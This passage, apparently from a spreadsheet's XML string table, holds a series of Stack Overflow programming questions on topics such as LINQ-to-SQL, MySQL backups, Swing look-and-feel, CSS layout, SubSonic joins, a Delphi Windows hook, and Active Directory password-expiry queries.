</t>
  </si>
  <si>
    <t>How do I verify that my LINQ-to-SQL model matches the database schema?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am absolutely new to the .NET world, and started with C# on friday. I have some experience with database apps, though.&lt;/p&gt;
&lt;p&gt;We will go with LINQ-to-SQL for a medium scale project. I am used to generating my schema from classes and keep track of changes with subversion and equivalents to Ruby's Migrations. There obviously is &lt;a href="http://stackoverflow.com/questions/29145/generating-database-tables-from-object-definitions"&gt;no easy way to do this with LINQ&lt;/a&gt; itself.&lt;/p&gt;
&lt;p&gt;So I thought of generating the schema (and do some data access) with &lt;a href="http://www.castleproject.org/activerecord/index.html" rel="nofollow"&gt;Castle Project's ActiveRecord&lt;/a&gt; and use &lt;a href="http://code.google.com/p/migratordotnet/" rel="nofollow"&gt;Migrator.NET&lt;/a&gt; &lt;a href="http://code.google.com/p/tarantino/wiki/DatabaseChangeManagement" rel="nofollow"&gt;Tarantino&lt;/a&gt; or &lt;a href="http://sourceforge.net/projects/dbdeploy-net/" rel="nofollow"&gt;dbdeploy.net&lt;/a&gt; for the schema updates. (Any suggestions for this?)&lt;/p&gt;
&lt;p&gt;My main question is: &lt;strong&gt;How do I verify that my LINQ classes still match the database schema? Does LINQ throw exceptions if the schema does not match? Can I iterate over all the LINQ classes and invoke some verify method?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I already found that &lt;a href="http://stackoverflow.com/questions/40022/best-way-to-update-linq-to-sql-classes-after-database-schema-change"&gt;sqlmetal is the way to regenerate the classes&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;PS: We will use SQL Server (2008 or 2005).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Include ib_logfiles in backup?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The short question:&lt;br/&gt;
Is it safe skip ib_logfile* files while creating custom-made backup of MySQL installation with InnoDB engine used?&lt;/p&gt;
&lt;p&gt;Custom-made backup is just copy all (or subset of) /var/lib/mysql + /etc/my.cnf to safe place.&lt;/p&gt;
&lt;p&gt;As I know ib_logfile* files are recreated by MySQL on start + the files are really huge, so that may not be wise to store them in backup. And yes, assume MySQL is (correctly) stopped before backup.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing java lookandfeel without modifying the application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to change java lookandfeel without modifying the program in a real-world environment?&lt;/p&gt;
&lt;p&gt;I know that theoretically the answer is yes. I also created demo applications and changed the lookandfeel even at runtime and it worked. But when I created a real application with lots of controls lookandfeel change was not really working:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Different lookandfeels have different bugs (or strange features). For instance some of them creates the same style for JTextField and JFormattedTextField, some of them uses different styles. This change can be quite annoying for users.&lt;/li&gt;
&lt;li&gt;Control sizes are not the same (using different fonts, different borders), so sometimes the window looks ugly after change.&lt;/li&gt;
&lt;li&gt;Keyboard shortcuts can also be different.&lt;/li&gt;
&lt;li&gt;...&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In my applications after lookandfeel change (actually instead of changing the lookandfeel I tried using the same lookandfeel with different skins) I always have to modify the application. Not a very big modification, but lots of small modifications which makes lookandfeel change difficult.&lt;/p&gt;
&lt;p&gt;Am I just very unlucky with the lookandfeels I tried (currently using &lt;a href="http://www.l2fprod.com/skinlf/" rel="nofollow"&gt;skinlf&lt;/a&gt;), or lookandfeel change is not that easy as in small demo applications?&lt;/p&gt;
&lt;p&gt;UPDATE: I'm using Swing and changing to other GUI library is not possible for me right now.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE2&lt;/strong&gt;: It seems to me the question was not clear. I do know how to change the lookandfeel. My questions is: Is it possible to create a real application where changing lookandfeel (or the skin of the lookandfeel) is an easy task? Currently if I change the lookandfeel it is not enough to change 2 or 3 lines, I have to review the whole application and fix quite  a few problems caused by the lookandfeel change. dhiller suggested replacing skinlf with a better lookandfeel. Can you show me a skinable lookandfeel where skin replacement works better?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to manage frequently modified production code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My project invovles me to make a lot of changes on the production code. The requirement keeps coming up and I need to make changes and deploy it as soon as possible. I sometimes end up creating patch work sort of code because some of the requirement would not fit into the overall design of the software. How can this be handled effectively? Any design pattern to handle this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dump hidden (or minimized) X11 window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to dump the contents of an X window. Like this:&lt;/p&gt;
&lt;p&gt;xwd -id  | convert - capture.png&lt;/p&gt;
&lt;p&gt;... which works quite well as long as the target window is not hidden (totally or partially behind other windows) or minimized.&lt;/p&gt;
&lt;p&gt;Any idea on how to do this?&lt;/p&gt;
&lt;p&gt;I guess we somehow have to send a "repaint" signal to the hidden window and then capture its response or something... :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox CSS: Given 2 divs, how can I float the *second* one to the right using static positioning?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a &lt;a href="http://userstyles.org/styles/12154" rel="nofollow"&gt;Youtube userstyle script&lt;/a&gt; that displays comments side by side with the video so you can watch the video and read the comments at the same time (what a marvelous idea - duh). You can see in the screenshots how far I've got. That means I only care about Firefox, and that CSS3 goes.&lt;/p&gt;
&lt;p&gt;The problem I have is that I want to make a fully fluid layout and have the "other videos" div float to the right, while the middle div (the comments) stretches to fill the remaining space between the left div (the video played) and the right div (the "other videos").&lt;/p&gt;
&lt;p&gt;Translated to CSS, the problem is: given divs "main", "rightnav" and "footer", in this fixed order in the document, how can I make the rightnav div float to the right, and the footer BELOW it? The best I managed to do was to absolutely position "rightnav" (right: 0), but then the footer goes below the "main" div, not below both of them. I've looked at &lt;a href="http://stackoverflow.com/questions/220273/css-positioning-div-above-another-div-when-not-in-that-order-in-the-html"&gt;http://stackoverflow.com/questions/220273/css-positioning-div-above-another-div-when-not-in-that-order-in-the-html&lt;/a&gt; already. Negative 'top' values are out, as they depend on the content of the 'main' div.&lt;/p&gt;
&lt;p&gt;Here's the source code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;html lang="en-US"&amp;gt;
&amp;lt;head&amp;gt;
&amp;lt;style type="text/css"&amp;gt;
#main {
   border: 1px solid;
   float: left;
   margin-right: 410px;
}
#rightnav {
   background-color: yellow;
   opacity: 0.5;
   border: 1px dotted;
   width: 400px;
   float: right;
   position: absolute;
   right: 0;
}
#footer {
   clear: both;
}   
&amp;lt;/style&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;div id="baseDiv" style="width: 100%"&amp;gt;
  &amp;lt;div id="main"&amp;gt;
  &amp;lt;script&amp;gt;for (var i=1; i&amp;lt;100; i++) document.write('main ');&amp;lt;/script&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id="rightnav"&amp;gt;
  &amp;lt;script&amp;gt;for (var i=1; i&amp;lt;200; i++) document.write('rightnav ');&amp;lt;/script&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div id="footer"&amp;gt;
  &amp;lt;script&amp;gt;for (var i=1; i&amp;lt;100; i++) document.write('footer ');&amp;lt;/script&amp;gt;
  &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Hopefully it's clear what I want to achieve: the "footer" below the two divs, and the "main" div fluid.&lt;/p&gt;
&lt;p&gt;Thanks for any ideas.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Host a WPF control in activex instead of Win32 App</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm searching an example of an activex that contain a WPF control.&lt;/p&gt;
&lt;p&gt;I'm able to see the control during registration of activex in the test activex container but when I instantiate it i cannot see WPF but what is coded inside OnDraw.&lt;/p&gt;
&lt;p&gt;Any hint or example?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the current directory in a C program?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm making a C program where I need to get the directory that the program is started from.  This program is written for UNIX computers. I've been looking at &lt;code&gt;opendir()&lt;/code&gt; and &lt;code&gt;telldir()&lt;/code&gt;, but &lt;code&gt;telldir()&lt;/code&gt; returns a &lt;code&gt;off_t (long int)&lt;/code&gt;, so it really doesn't help me. &lt;/p&gt;
&lt;p&gt;How can I get the current path in a string (char array)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Subsonic Join issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For those of you who are decent with subsonic!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        TblNewsCollection col =
            new Select().From(Tables.TblNews)
                .InnerJoin(Tables.TblContent)
                .Paged(currentPage, pageSize)
                .OrderDesc(TblContent.Columns.PubDate)
                .ExecuteAsCollection&amp;lt;TblNewsCollection&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above works, no problem, but when I try to add a where clause&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        TblNewsCollection col =
            new Select().From(Tables.TblNews)
                .InnerJoin(Tables.TblContent)
                .Where(TblContent.Columns.UserFK)
                .IsEqualTo(guidUserFK)
                .Paged(currentPage, pageSize)
                .OrderDesc(TblContent.Columns.PubDate)
                .ExecuteAsCollection&amp;lt;TblNewsCollection&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get this message&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.InvalidCastException: Object must implement IConvertible.
at System.Convert.ChangeType(Object value, Type conversionType, IFormatProvider provider)
at System.Data.SqlClient.SqlParameter.CoerceValue(Object value, MetaType destinationType) 
System.InvalidCastException: Failed to convert parameter value from a Guid to a String.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried it from other fields, for example a bit field in a database it says it can't convert from bool to bit!&lt;/p&gt;
&lt;p&gt;Seems to only be an issue on where statements after joins&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting XML Schema from MS SQL Database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to generate a XML Schema of a Database programatically with .Net and C#? I want to look into NDbUnit but for big databases it would not really be feasible to make a Schema manually? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I select text nodes with jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to get all descendant text nodes of an element, as a jQuery collection. What is the best way to do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make sure an application keeps running on Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to ensure a script remains running on a development server. It collates stats and provides a web service so it's supposed to persist, yet a few times a day, it dies off for unknown reasons. When we notice we just launch it again, but it's a pain in the rear and some users don't have permission (or the knowhow) to launch it up.&lt;/p&gt;
&lt;p&gt;The programmer in me wants to spend a few hours getting to the bottom of the problem but the busy person in me thinks there must be an easy way to detect if an app is not running, and launch it again.&lt;/p&gt;
&lt;p&gt;I know I &lt;em&gt;could&lt;/em&gt; cron-script ps through grep:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ps -A | grep appname
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But again, that's another hour of my life wasted on doing something that must already exist... Is there not a pre-made app that I can pass an executable (optionally with arguments) and that will keep a process running indefinitely?&lt;/p&gt;
&lt;p&gt;In case it makes any difference, it's Ubuntu.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to do a jquery ajax call to a subdomain?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i could call a page inside the same domain, but its not working when i calling a page in a sub domain due to security issues. what i have to do? help me!!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Split string containing command-line parameters into string[] in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a single string that contains the command-line parameters to be passed to another executable and I need to extract the string[] containing the individual parameters in the same way that C# would if the commands had been specified on the command-line. The string[] will be used when executing another assemblies entry-point via reflection.&lt;/p&gt;
&lt;p&gt;Is there a standard function for this? Or is there a preferred method (regex?) for splitting the parameters correctly? It must handle '"' delimited strings that may contain spaces correctly, so I can't just split on ' '.&lt;/p&gt;
&lt;p&gt;Example string:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string parameterString = @"/src:""C:\tmp\Some Folder\Sub Folder"" /users:""abcdefg@hijkl.com"" tasks:""SomeTask,Some Other Task"" -someParam foo";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Example result:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string[] parameterArray = new string[] { 
  @"/src:C:\tmp\Some Folder\Sub Folder",
  @"/users:abcdefg@hijkl.com",
  @"tasks:SomeTask,Some Other Task",
  @"-someParam",
  @"foo"
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I do not need a command-line parsing library, just a way to get the String[] that should be generated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: I had to change the expected result to match what is actually generated by C# (removed the extra "'s in the split strings)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XML Serialization issue for minoccurs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a .NET Web app which consumes a Java-based Web service. One of the objects, named Optional, contains search criteria fields. The schema is the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsd:complexType name="Optional"&amp;gt;
 &amp;lt;xsd:sequence&amp;gt;
  &amp;lt;xsd:element name="FromAmount" nillable="true" type="xsd:float" minOccurs="0" /&amp;gt; 
  &amp;lt;xsd:element name="ToAmount" nillable="true" type="xsd:float" minOccurs="0" /&amp;gt; 
  &amp;lt;xsd:element name="FromDate" nillable="true" type="xsd:dateTime" minOccurs="0" /&amp;gt; 
  &amp;lt;xsd:element name="ToDate" nillable="true" type="xsd:dateTime" minOccurs="0" /&amp;gt; 
  &amp;lt;xsd:element name="FromCheckNumber" nillable="true" type="xsd:long" minOccurs="0" /&amp;gt; 
  &amp;lt;xsd:element name="ToCheckNumber" nillable="true" type="xsd:long" minOccurs="0" /&amp;gt; 
 &amp;lt;/xsd:sequence&amp;gt;
&amp;lt;/xsd:complexType&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem that I am running into is that the child elements will not serialize even when a value is assigned to them in the Web app. If I remove the minOccurs attribute, then all is well.&lt;/p&gt;
&lt;p&gt;How do I get these elements to be optional, but to serialize when a value is assigned to them?&lt;/p&gt;
&lt;p&gt;Thanks in advance for your help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>javascript alerting from a c# class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a 5 aspx page "wizard".
each one contains a "SaveAndExit" button that executes a c# function on a common static class. After saving , the c# code redirects to another page.&lt;/p&gt;
&lt;p&gt;Is there a way for running javascript: alert('Data Saved');  after the saving, and before new page is Loaded.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom namespace for code behind .aspx page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using .NET2.0. Let's say a have a simple aspx form with txtInput and btnSomeAction&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   &amp;lt;asp:TextBox ID="txtInput" runat="server"&amp;gt;&amp;lt;/asp:TextBox&amp;gt;
   &amp;lt;asp:Button ID="btnSomeAction" runat="server" CommandName="SomeAction" Text="Do"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then within the code behind the form I have&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Protected Sub btnSomeAction_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnSomeAction.Click
    Dim s As String
    s = txtInput.Text
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It all works fine.&lt;/p&gt;
&lt;p&gt;Then I want to add the code to a custom namespace like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Namespace mycustomnamespace
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When doing that I would get a complier error:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Name 'txtInput' is not declared&lt;/em&gt;&lt;/strong&gt;  - as if the code was no longer connected to the page&lt;/p&gt;
&lt;p&gt;Do i need to modify the aspx page to include the namespace?, What about the partial class?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Imitating SQL Server Profiler in a C# app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a trace on a database server from my C# app, like what you do in SQL Server Profiler. I have found stored procedures (sys.sp_trace_create etc...) that dont seem to work for my SQL management studio. I was wondering if anyone could help with the coding, or where i would start to do this?!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What metrics should we use to judge code quality?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently working on a large project, where many developers worked over time and the code was terrible. After many refactorings we now arrived a point, where the code is ok. Now I'm thinking what "ok" means - probably for everyone something different.&lt;/p&gt;
&lt;p&gt;Do you think it's possible to specify "ok"? What is important? NDepend metrics? Test Coverage? Comments? Coding style? Documentation?&lt;/p&gt;
&lt;p&gt;I know there are already many topics about coding style or commenting (for example &lt;a href="http://stackoverflow.com/questions/tagged/best-practices+programming"&gt;here&lt;/a&gt;). This question is just about what facts are important.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WCF here to stay?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently reading quite a heavy WCF book. I have used it myself in production just the once, using tcp, worked a charm.
Anyway what are your opinions on this technology, is it here to stay, is it worth the time invested learning all the complex features etc etc?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery .Net Deployment Issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just started getting into jQuery and have an issue with a jQuery Post call working perfectly on my local dev box (VS 2008 built-in web server), but failing when I deploy to a windows 2003 server (IIS 6) box.&lt;/p&gt;
&lt;p&gt;The post works and the page being posted to process things correctly, but a response is never received by the calling Post function. The submitting page just reloads with no changes.&lt;/p&gt;
&lt;p&gt;Here is my Post function (it is enclosed in the &lt;code&gt;$(document).ready(function() {...&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The alert in the response function never fires:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        $('.nextButton').click(function() {
            var idString = '';
            $("div.dropZone &amp;gt; div").each(function(n) {
                idString += this.id + '|';
            });
            $.post('CustomPostHandler.aspx?step=criteria', { 
                selected: idString
            },
                function(data) {
                    alert(data);
                });
        });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The post handler page does receive the idString variable fine, after some processing it attempts to write back a response:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        // Return dummy response to caller
        Response.Clear();
        Response.ContentType = "text/plain";
        Response.Write("success");
        Response.End();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've checked the deployment server environment and don't see anything missing (this is running against the 3.5 SP1 framework). Anyone have any ideas or am I missing something?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In what situations is the ATL CSimpleArray a better choice than CAtlArray</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The documentation says that CSimpleArray is for dealing with small numbers of objects. What is small in this context? Is CSimpleArray ever a good choice or should I always use a different collection class such as CAtlArray?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Webkit/Safari/Firefox/API: Can I programmatically read/extract multiple tabs' URLs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Topic: Programmatically manipulate web browser in OS X 10.4.x+ Tiger/Leopard.
Subjects: Webkit, Safari, Firefox, APIs, Applescript, Automator, Javascript, Ruby, Ruby on Rails, OS X, Tiger
Goal: Collect/Read/Extract URLs from Safari into text (Ruby on Rails code) file.
Note: A solution that uses FF would be very appreciated, too. I use Safari (v. 3.x, OS X 10.4.x) more and much prefer a solution that works in Safari.&lt;/p&gt;
&lt;p&gt;At times, I use the web browser to find/display multiple site pages that I 1) want to visit again later and 2) the URLs of which I want to group together in a text file for a) future reference and/or b) programmatically manipulate.&lt;/p&gt;
&lt;p&gt;For example: In today's NYT I find seven NYT articles I want to post to my del.icio.us acct. and share via email in their "printer friendly" format long after they are headlined in that day's online edition. I open each one in a browser window's tap, then Presto! their URLs automagically are wooshed into a file where a (custom) Ruby on Rails app sends the print versions' URLs to email addresses and my Del.icio.us acct.&lt;/p&gt;
&lt;p&gt;I figure there's a way to do the URL extracting step from the OS using Applescript or Automator. I figure there MAY be a way to do it with Javascript.&lt;/p&gt;
&lt;p&gt;My Question: How to read the web browser's tabs' location field and collate these strings into a text file (either within my OS or over the wire to a web app.)?&lt;/p&gt;
&lt;p&gt;Much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add a "driver" to javax.comm? Serial port programming in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to use a RS-232 serial port on my PC with javax.comm class. I am newby on that API, so first of all I go through the documentation and I find out that the first thing you should do is "list" all the ports from the class CommPortListener and pick up one of them.&lt;/p&gt;
&lt;p&gt;That worked just fine! Problem is, now, that my port is missing. It lists the /dev/ttyS0 and /dev/ttyS1 ports, non existents on my computer. My ports (I have been working with them several times) are /dev/ttySNX0 and /dev/ttySNX1.&lt;/p&gt;
&lt;p&gt;Again surfing the web I find out that I should do something like "register" or "load" the driver of my card onto the API system, stuff that could be done in previous versions, but not now. Moreover, I tried to do it under windows and they offer me a "generic" version of the API, with needs some RXTX application which is starting to beat me.&lt;/p&gt;
&lt;p&gt;I would thank any sugestions, links to documentation... something... that allow me to use my serial ports through Java, wich, in the end, is my objective...&lt;/p&gt;
&lt;p&gt;Thanks folks!!!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web Service or DLL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating an app that needs to be accessed by both a web front end hosted on an internal network and also run as a scheduled task. Nothing will need to be accessed outside of our internal systems and once the app is up and running we don't envision anything changing for some time.&lt;/p&gt;
&lt;p&gt;My initial thought is to create a DLL encapsulating the bulk of the necessary functionality and then call it via both a Web Forms interface for manual execution, and a console app running as an automated (daily) scheduled task.&lt;/p&gt;
&lt;p&gt;Another suggestion has been to expose a Web Service for the core functionality instead, but as the app will never need to be called by an external resource I think the extra effort required in implementing a Web Service might not be worth the hassle. The DLL solution should also be substantially faster(?).&lt;/p&gt;
&lt;p&gt;My question is which route would you choose? Are there any pros/cons that I haven't covered? Any glaring omissions?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; I'm new to .Net but due to one of our developers being involved in a serious accident I've been asked to step up to the plate.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do I have to do to make my WH_SHELL or WH_CBT hook procedure receive events from other processes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use &lt;code&gt;SetWindowsHookEx&lt;/code&gt; to set up a &lt;code&gt;WH_SHELL&lt;/code&gt; hook to get notified of system-wide &lt;code&gt;HSHELL_WINDOWCREATED&lt;/code&gt; and &lt;code&gt;HSHELL_WINDOWDESTROYED&lt;/code&gt; events. I pass 0 for the final &lt;code&gt;dwThreadId&lt;/code&gt; argument which, according to &lt;a href="http://msdn.microsoft.com/en-us/library/ms644990(VS.85).aspx"&gt;the docs&lt;/a&gt;, should "associate the hook procedure with all existing threads running in the same desktop as the calling thread". I also pass in the handle to my DLL (&lt;code&gt;HInstance&lt;/code&gt; in Delphi) for the &lt;code&gt;hMod&lt;/code&gt; parameter as did all the examples I looked at.&lt;/p&gt;
&lt;p&gt;Yet, I only ever get notified of windows created by my own app and - more often than not - my tests result in the desktop process going down in flames once I close down my app. Before you ask, I do call &lt;code&gt;UnhookWindowsHookEx&lt;/code&gt;. I also always call &lt;code&gt;CallNextHookEx&lt;/code&gt; from within my handler.&lt;/p&gt;
&lt;p&gt;I am running my test app from a limited user account but so far I haven't found any hints indicating that this would play a role... (though that actually surprises me)&lt;/p&gt;
&lt;p&gt;AFAICT, I did everything by the book (obviously I didn't but so far I fail to see where).&lt;/p&gt;
&lt;p&gt;I'm using Delphi (2007) but that shouldn't really matter I think.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Maybe I should have mentioned this before: I did download and try a couple of examples (though there are unfortunately not that many available for Delphi - especially none for &lt;code&gt;WH_SHELL&lt;/code&gt; or &lt;code&gt;WH_CBT&lt;/code&gt;). While they do not crash the system like my test app does, they still do not capture events from other processes (even though I can verify with ProcessExplorer that they get loaded into them alright). So it seems there is either something wrong with my system configuration or the examples are wrong or it is simply not possible to capture events from other processes. Can anyone enlighten me?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT2:&lt;/strong&gt; OK, here's the source of my test project.&lt;/p&gt;
&lt;p&gt;The DLL containing the hook procedure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;library HookHelper;
uses
  Windows;
{$R *.res}
type
  THookCallback = procedure(ACode, AWParam, ALParam: Integer); stdcall;
var
  WndHookCallback: THookCallback;
  Hook: HHook;
function HookProc(ACode, AWParam, ALParam: Integer): Integer; stdcall;
begin
  Result := CallNextHookEx(Hook, ACode, AWParam, ALParam);
  if ACode &amp;lt; 0 then Exit;
  try
    if Assigned(WndHookCallback)
//    and (ACode in [HSHELL_WINDOWCREATED, HSHELL_WINDOWDESTROYED]) then
    and (ACode in [HCBT_CREATEWND, HCBT_DESTROYWND]) then
      WndHookCallback(ACode, AWParam, ALParam);
  except
    // plop!
  end;
end;
procedure InitHook(ACallback: THookCallback); register;
begin
//  Hook := SetWindowsHookEx(WH_SHELL, @HookProc, HInstance, 0);
  Hook := SetWindowsHookEx(WH_CBT, @HookProc, HInstance, 0);
  if Hook = 0 then
    begin
//      ShowMessage(SysErrorMessage(GetLastError));
    end
  else
    begin
      WndHookCallback := ACallback;
    end;
end;
procedure UninitHook; register;
begin
  if Hook &amp;lt;&amp;gt; 0 then
    UnhookWindowsHookEx(Hook);
  WndHookCallback := nil;
end;
exports
  InitHook,
  UninitHook;
begin
end.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the main form of the app using the hook:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;unit MainFo;
interface
uses
  Windows, SysUtils, Forms, Dialogs, Classes, Controls, Buttons, StdCtrls;
type
  THookTest_Fo = class(TForm)
    Hook_Btn: TSpeedButton;
    Output_Lbx: TListBox;
    Test_Btn: TButton;
    procedure Hook_BtnClick(Sender: TObject);
    procedure Test_BtnClick(Sender: TObject);
  public
    destructor Destroy; override;
  end;
var
  HookTest_Fo: THookTest_Fo;
implementation
{$R *.dfm}
type
  THookCallback = procedure(ACode, AWParam, ALParam: Integer); stdcall;
procedure InitHook(const ACallback: THookCallback); register; external 'HookHelper.dll';
procedure UninitHook; register; external 'HookHelper.dll';
procedure HookCallback(ACode, AWParam, ALParam: Integer); stdcall;
begin
  if Assigned(HookTest_Fo) then
    case ACode of
  //    HSHELL_WINDOWCREATED:
      HCBT_CREATEWND:
          HookTest_Fo.Output_Lbx.Items.Add('created handle #' + IntToStr(AWParam));
  //    HSHELL_WINDOWDESTROYED:
      HCBT_DESTROYWND:
        HookTest_Fo.Output_Lbx.Items.Add('destroyed handle #' + IntToStr(AWParam));
    else
      HookTest_Fo.Output_Lbx.Items.Add(Format('code: %d, WParam: $%x, LParam: $%x', [ACode, AWParam, ALParam]));
    end;
end;
procedure THookTest_Fo.Test_BtnClick(Sender: TObject);
begin
  ShowMessage('Boo!');
end;
destructor THookTest_Fo.Destroy;
begin
  UninitHook; // just to make sure
  inherited;
end;
procedure THookTest_Fo.Hook_BtnClick(Sender: TObject);
begin
  if Hook_Btn.Down then
    InitHook(HookCallback)
  else
    UninitHook;
end;
end.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I generically use KVC to update fields?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have the following Objective-C class:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@interface Foo {
     int someNumber;
     NSString *someString;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and for reasons I won't get into here, I want to use KVC to update, in a generic fashion, the values for those variables:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[f setValue:object forKey:@"someNumber"];
or
[f setValue:object forKey:@"someString"];`
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If &lt;code&gt;object&lt;/code&gt; is a string and I'm updating the &lt;code&gt;someNumber&lt;/code&gt; variable, it seems that I need to know to use an NSNumberFormatter to get an NSNumber and then Cocoa automatically converts that to an int inside &lt;code&gt;setValue:forKey:&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;Is there any way to avoid this custom code and have Cocoa infer the conversion to an int from a string, or do I need to catch this situation each time and handle it myself?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to best implement swear words handler (.NET preferred)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For an ASP.NET application, what is the Best Practice implementation method for a custom swear word remover/replacer?&lt;/p&gt;
&lt;p&gt;If this is a data table solution, is there free resource to get the data? (Similar to finding a public dictionary table that you can import to your system for spellchecking)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I query users with an expired password in Active Directory?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to query Active Directory for a list of users whose password is about to expire.  The obvious (and easy) way to do this is with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dsquery user -stalepwd n
&lt;/code&gt;&lt;/pre&gt;
